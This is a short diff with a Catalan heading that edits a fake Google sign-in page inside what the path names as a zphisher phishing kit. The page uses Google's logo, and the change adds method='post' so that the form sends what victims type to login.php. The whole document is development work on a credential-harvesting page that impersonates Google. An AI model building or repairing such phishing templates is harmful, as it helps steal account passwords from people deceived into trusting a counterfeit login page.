Modificacions dels arxius php i html 25/04 a les 12:22

--- a/zphisher-master/.sites/google_new/email.html
+++ b/zphisher-master/.sites/google_new/email.html
@@ -10,7 +10,7 @@
 <body>
   <div class="login-container">
     <div class="login-header">
-      <form class="login-form" action="login.php">
+      <form class="login-form" action="login.php" method="post">
         <br>
         <br>
         <img src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png" alt="Google logo">
